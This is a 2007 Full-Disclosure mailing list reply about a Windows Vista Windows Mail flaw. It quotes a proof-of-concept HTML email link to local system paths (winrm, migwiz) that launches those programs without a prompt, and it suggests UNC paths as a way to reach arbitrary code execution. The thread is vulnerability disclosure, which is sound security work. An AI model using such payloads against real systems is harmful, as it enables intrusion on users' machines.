[Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Joxean Koret
joxeankoret at yahoo.es
Fri Mar 23 10:15:57 GMT 2007
Hi,
Did you test it using UNC paths? It may be a way to
truly execute arbitrary code.
Regards,
Joxean Koret
>Exploit:
>Send a HTML email message containing the URL:
><a href="c:/windows/system32/winrm?">Click here!</a>
>or
><a href="c:/windows/system32/migwiz?">Click here!</a>
>and winrm.cmd/migwiz.exe gets executed without asking
>for permission.
>These are just examples.
>
>I could not pass arguments to winrm (hehe this would
>be beautiful), but I guess there
>are several attack vectors.
______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y móviles desde 1 céntimo por minuto.
http://es.voice.yahoo.com
Full-Disclosure is hosted and sponsored by Secunia.